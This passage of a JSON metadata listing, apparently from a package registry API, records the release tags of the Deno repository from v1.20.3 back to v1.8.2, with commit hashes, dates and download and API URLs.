","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"